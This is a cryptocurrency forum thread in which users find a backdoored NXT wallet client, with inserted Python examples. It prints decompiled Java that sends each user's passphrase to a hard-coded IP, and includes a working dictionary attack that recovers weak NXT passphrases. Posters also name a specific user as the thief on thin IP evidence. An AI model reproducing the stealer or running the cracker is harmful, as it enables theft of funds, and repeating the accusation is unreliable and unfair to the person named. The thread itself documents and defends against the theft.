|
PaulyC
|
|
January 02, 2014, 01:38:31 AM |
|
Ok here are the two zip files in one file. The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. The smaller one I believe was the one posted on the front page? DO NOT USE THIS FILE FOR NXT: https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo

The link is gone. The thief has probably taken it away. Can you upload your zip download?

The link I posted that says do not use? Or did you mean to copy someone else's post? I made that link there; it has the zip inside, it's the smaller file. I don't have the exact link of where I DL'ed it, but I believe it was Mega and it was definitely linked from Nextcoin.org.

@xyzzyx oh my bad, I just rar'd it together and threw the extension on the whole file, sorry.
|
Doge Mars Landing Foundation (founder) Coined the phrase, "Doge to the Mars" and "Check that Hash!". Discoverer of the 2013 NXT nefarious wallet. Admin. FameMom [FAMOM]
|
|
|
notsoshifty
|
|
January 02, 2014, 01:38:41 AM |
|
Ok here are the two zip files in one file. The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. The smaller one I believe was the one posted on the front page? DO NOT USE THIS FILE FOR NXT: https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo

The file you uploaded is a RAR file, not zip, even though it has a zip extension. Just an FYI for others who attempt to open it and get an error.

First file inside is 7173063 bytes in size and has the SHA256 hash:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (2).zip

The second file inside is 7177834 bytes in size and has the SHA256 hash:
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

Damn. I'll leave further analysis to those who have more experience. I only just started learning Java a few months back to do Android programming. I'm more of an assembly/hardware guy.

Interesting...:

```java
if (!paramString.equals("")) {
    if (!myKeys.contains(paramString)) {
        // sends the passphrase, URL-encoded, to a hard-coded host before the key is derived
        URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
        URLConnection connection = url.openConnection();
        connection.setConnectTimeout(10000);
        connection.getInputStream();
        myKeys.add(paramString);   // remembered so each passphrase is sent only once per run
    }
}
```
|
|
|
|
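An added example, not code from the thread or from the NXT project, of the two checks notsoshifty's post implies: compare a download's SHA-256 against the two values posted above, and diff the URL literals found in the class files of the two archives so that a hard-coded string such as http://162.243.246.223:3000/ stands out. The archive layout (a zip that contains a jar that contains .class files), the in-memory sample archives and the stand-in .class bytes (only the class-file magic number plus some strings, enough for a string scan but not real bytecode) are constructed for this demonstration.

```python
"""Verify a downloaded NXT client archive and hunt for hard-coded URL literals.

Added example, not part of the original thread.  It assumes the two SHA-256
values posted in the thread and a zip-containing-jar layout; the sample
archives built by build_sample_archives() are constructed, not real releases.
"""
import hashlib
import io
import re
import zipfile

# SHA-256 values as posted in the thread (the smaller file was reported as the
# good one, the larger as the one in use when funds were stolen).
KNOWN_HASHES = {
    "ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2":
        "nxt-client-0.4.8 (2).zip (posted as the clean client)",
    "948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06":
        "nxt-client-0.4.8.zip (posted as the suspect client)",
}

# http(s)://host[:port][/path...], matched over raw class-file bytes
URL_RE = re.compile(rb"https?://[0-9A-Za-z.\-]+(?::\d{1,5})?[/\w.%\-]*")


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def classify(data: bytes) -> str:
    """Return the thread's label for a known archive, or 'unknown'."""
    return KNOWN_HASHES.get(sha256_bytes(data), "unknown")


def iter_class_files(data: bytes, prefix: str = ""):
    """Yield (path, bytes) for every .class entry, descending into nested jars/zips."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = prefix + info.filename
            lower = info.filename.lower()
            if lower.endswith((".jar", ".zip", ".war")):
                yield from iter_class_files(zf.read(info), name + "!/")
            elif lower.endswith(".class"):
                yield name, zf.read(info)


def url_literals(data: bytes) -> dict:
    """Map each URL-looking string to the set of class files that contain it."""
    found = {}
    for path, body in iter_class_files(data):
        for m in URL_RE.finditer(body):
            found.setdefault(m.group(0).decode("ascii", "replace"), set()).add(path)
    return found


def diff_url_literals(good: bytes, suspect: bytes) -> dict:
    """URL literals present in the suspect archive but absent from the good one."""
    good_urls = url_literals(good)
    return {u: paths for u, paths in url_literals(suspect).items() if u not in good_urls}


def _fake_class(strings) -> bytes:
    """Stand-in for a .class file: magic number plus NUL-separated constant strings."""
    return b"\xca\xfe\xba\xbe" + b"\x00".join(s.encode("ascii") for s in strings)


def build_sample_archives():
    """Constructed clean and backdoored archives mirroring the thread's layout."""
    def build(crypto_strings):
        jar = io.BytesIO()
        with zipfile.ZipFile(jar, "w") as j:
            j.writestr("nxt/Nxt$Crypto.class", _fake_class(crypto_strings))
            j.writestr("nxt/Nxt$Peer.class", _fake_class(["getPeers", "UTF-8"]))
        outer = io.BytesIO()
        with zipfile.ZipFile(outer, "w") as z:
            z.writestr("nxt/nxt.jar", jar.getvalue())
            z.writestr("nxt/run.sh", "java -cp nxt.jar nxt.Nxt\n")
        return outer.getvalue()

    clean = build(["SHA-256", "UTF-8"])
    backdoored = build(["SHA-256", "UTF-8", "http://162.243.246.223:3000/", "ISO-8859-1"])
    return clean, backdoored


if __name__ == "__main__":
    clean, suspect = build_sample_archives()
    print("clean archive:", classify(clean), "| suspect archive:", classify(suspect))
    for url, paths in diff_url_literals(clean, suspect).items():
        print("only in suspect:", url, "in", sorted(paths))
```

For a real download, read the zip from disk into `data`, check `classify(data)` first, and only then bother with the string diff; a hash mismatch against a value published out of band is already the answer. The string diff is a cheap first pass, not a substitute for decompiling as mkmen did, since a backdoor can build its URL at runtime from pieces that no regex will match.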
jl777
Legendary
Offline
Activity: 1176
Merit: 1134
|
|
January 02, 2014, 01:39:58 AM |
|
Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...
Still, there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security, both perceived and actual.
If the hacker has to search a space 2^256, then even with petahashes it will take a long time. However, I am worried about clustering especially with user selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable looking but weak passwords to intentionally get hacked and give us black PR.
I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.
Not sure how much this will cost, but it will go a long way toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?
James
P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?
|
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 01:42:50 AM |
|
Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...
Still, there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security, both perceived and actual.
If the hacker has to search a space 2^256, then even with petahashes it will take a long time. However, I am worried about clustering especially with user selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable looking but weak passwords to intentionally get hacked and give us black PR.
I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.
Not sure how much this will cost, but it will go a long way toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?
James
P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?

Agree. PaulyC deserves a bounty for uncovering this type of thief.
|
|
|
|
mkmen
|
|
January 02, 2014, 01:43:43 AM |
|
clean:

```java
static byte[] getPublicKey(String secretPhrase) {
    try {
        byte[] publicKey = new byte[32];
        // public key = Curve25519 keygen over SHA-256(passphrase as UTF-8)
        Nxt.Curve25519.keygen(publicKey, null, MessageDigest.getInstance("SHA-256").digest(secretPhrase.getBytes("UTF-8")));
        return publicKey;
    } catch (Exception e) {}
    return null;
}
```

vs

```java
static byte[] getPublicKey(String paramString) {
    try {
        if (!paramString.equals("")) {
            if (!myKeys.contains(paramString)) {
                // added block: sends the passphrase to 162.243.246.223:3000 before deriving the key,
                // once per passphrase per run; any failure is swallowed so the client keeps working
                URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
                URLConnection connection = url.openConnection();
                connection.setConnectTimeout(10000);
                connection.getInputStream();
                myKeys.add(paramString);
            }
        }
    } catch (Exception localException) {}
    try {
        // the original derivation follows unchanged
        byte[] arrayOfByte = new byte[32];
        Nxt.Curve25519.keygen(arrayOfByte, null, MessageDigest.getInstance("SHA-256").digest(paramString.getBytes("UTF-8")));
        return arrayOfByte;
    } catch (Exception localException1) {}
    return null;
}
```

Clearly someone modified Nxt$Crypto.class.

EDIT: the question is who, and where did you guys download this (where was the link)?
|
|
|
|
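An added example, not NXT's own code, serving two passages: mkmen's clean getPublicKey above and jl777's earlier point about the offline parallel attack on weak passphrases. It reimplements the clean derivation in Python (SHA-256 of the UTF-8 passphrase, then Curve25519 keygen) using a textbook X25519 ladder from RFC 7748 in place of Nxt.Curve25519.keygen, on the assumption that keygen is standard Curve25519 scalar multiplication by the base point with the usual clamping. The account-number rule (first 8 bytes of SHA-256 of the public key, read little-endian) is likewise an assumption about the 0.4.x client, and the wordlist is constructed. The attack function shows why jl777's worry holds: with no salt and no slow KDF, one hash and one keygen per guess tests a candidate passphrase against every public key ever published on the chain at once.

```python
"""NXT-style key derivation and the offline passphrase attack it enables.

Added example, not code from the NXT project.  The X25519 ladder below
(RFC 7748 section 5, not constant-time) stands in for Nxt.Curve25519.keygen;
the account-ID rule is an assumption and the wordlist is constructed.
"""
import hashlib
from typing import Dict, Iterable, Set

P = 2**255 - 19
A24 = 121665
BASEPOINT_U = b"\x09" + b"\x00" * 31


def _clamp(k: bytes) -> int:
    """Same clamping Curve25519.keygen applies to the 32-byte SHA-256 digest."""
    k = bytearray(k)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return int.from_bytes(k, "little")


def x25519(scalar: bytes, u: bytes = BASEPOINT_U) -> bytes:
    """Montgomery ladder: x-coordinate of scalar * u, as 32 little-endian bytes."""
    k = _clamp(scalar)
    x1 = int.from_bytes(u, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:  # data-dependent branch: fine for a demo, not side-channel safe
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = pow(da + cb, 2, P)
        z3 = x1 * pow(da - cb, 2, P) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def nxt_public_key(secret_phrase: str) -> bytes:
    """The clean getPublicKey from the thread: keygen over SHA-256(passphrase)."""
    return x25519(hashlib.sha256(secret_phrase.encode("utf-8")).digest())


def nxt_account_id(public_key: bytes) -> int:
    """Assumed account-number rule: first 8 bytes of SHA-256(pubkey), little-endian."""
    return int.from_bytes(hashlib.sha256(public_key).digest()[:8], "little")


def offline_dictionary_attack(targets: Set[bytes], candidates: Iterable[str]) -> Dict[bytes, str]:
    """jl777's 'offline parallel attack': no salt and no KDF, so every public key
    seen on the chain is tested by a single SHA-256 + keygen per guessed phrase."""
    hits: Dict[bytes, str] = {}
    for phrase in candidates:
        pk = nxt_public_key(phrase)
        if pk in targets:
            hits[pk] = phrase
    return hits


# Constructed wordlist: the kind of 'reasonable looking but weak' passphrases
# jl777 worries about.  A real attacker would use a multi-million-entry list.
WORDLIST = ["password", "letmein", "nxt2014", "correct horse battery staple", "doge to the mars"]


if __name__ == "__main__":
    victims = {nxt_public_key("correct horse battery staple"), nxt_public_key("Xq7#9vL!pR2zW8mN")}
    for pk, phrase in offline_dictionary_attack(victims, WORDLIST).items():
        print("account", nxt_account_id(pk), "opened by passphrase", repr(phrase))
```

Only the account whose passphrase appears in the list is recovered; the random 16-character one survives because the attacker's cost per guess is the same one hash plus one keygen the client itself pays, and only the size of the search space protects the user. That is the structural reason an external review of the scheme, as jl777 asks for, should look at the passphrase-to-key path and not only at the curve.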
salsacz
|
|
January 02, 2014, 01:44:12 AM |
|
We need to lock all wiki pages with a download link against public editing; all download links should point to the first post of this topic instead of to direct downloads.
|
|
|
|
NxtChoice
|
|
January 02, 2014, 01:44:18 AM |
|
How do you confirm you are forging 24/7?
|
|
|
|
S3MKi
Legendary
Offline
Activity: 1540
Merit: 1016
|
|
January 02, 2014, 01:45:56 AM |
|
We need to lock all wiki pages with a download link against public editing; all download links should point to the first post of this topic instead of to direct downloads.
agree
|
|
|
|
notsoshifty
|
|
January 02, 2014, 01:46:08 AM |
|
Interesting...:

```java
if (!paramString.equals("")) {
    if (!myKeys.contains(paramString)) {
        URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
        URLConnection connection = url.openConnection();
        connection.setConnectTimeout(10000);
        connection.getInputStream();
        myKeys.add(paramString);
    }
}
```

epicdices.com is also hosted on 162.243.246.223 - coincidence?
|
|
|
|
EvilDave
|
|
January 02, 2014, 01:48:41 AM |
|
So, for the slower people here ( ie; me):
The smaller file: First file inside is 7173063 bytes in size and has the SHA256 hash: ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (2).zip
Is the correct client.
and the larger file:
The second file inside is 7177834 bytes in size and has the SHA256 hash: 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip
has probably had some sort of backdoor added to allow thievery?
Bastards, btw, if this is confirmed.
|
|
|
|
Damelon
Legendary
Offline
Activity: 1092
Merit: 1010
|
|
January 02, 2014, 01:48:53 AM |
|
We need to lock all wiki pages with a download link against public editing; all download links should point to the first post of this topic instead of to direct downloads.
agree

joefox already locked some pages today, but there were translator issues related to that. I'm just saying this to let everyone know that he has been on the ball concerning wiki security.
|
|
|
|
PaulyC
|
|
January 02, 2014, 01:49:25 AM |
|
Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...
James
P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?
Agree. PaulyC deserves a bounty for uncovering this type of thief.

OMG, that would be amazing if that's possible, or anything. Not to get ahead of myself, but Newcn too. I mean he verified to me we had a very similar occurrence, way too much of a coincidence. Thanks for any help!
|
|
|
|
|
|
salsacz
|
|
January 02, 2014, 01:52:03 AM |
|
Interesting...:

```java
if (!paramString.equals("")) {
    if (!myKeys.contains(paramString)) {
        URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
        URLConnection connection = url.openConnection();
        connection.setConnectTimeout(10000);
        connection.getInputStream();
        myKeys.add(paramString);
    }
}
```

epicdices.com is also hosted on 162.243.246.223 - coincidence?

No, as I wrote here, we know the identity of the hacker: 162.243.246.223 looks like it is "epicdices.com" ( http://domain-kb.com/www/epicdices.com ). The owner of epicdices, EpicThomas, is a member of this topic: https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts
|
|
|
|
intel
Member
Offline
Activity: 98
Merit: 10
|
|
January 02, 2014, 01:53:44 AM |
|
|
|
|
|
newcn
|
|
January 02, 2014, 01:57:24 AM |
|
Paulc, how much did you lose? I lost about 18k NXT!
|
BTC:1NzzfeHCgN8fF6mSG1UeBFCVd2cxKbGyHk NXT:13187911577562526278
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 01:58:23 AM |
|
|
|
|
|
S3MKi
Legendary
Offline
Activity: 1540
Merit: 1016
|
|
January 02, 2014, 01:58:50 AM |
|
Paulc, how much did you lose? I lost about 18k NXT!

About 7000, I think.
|
|
|
|
|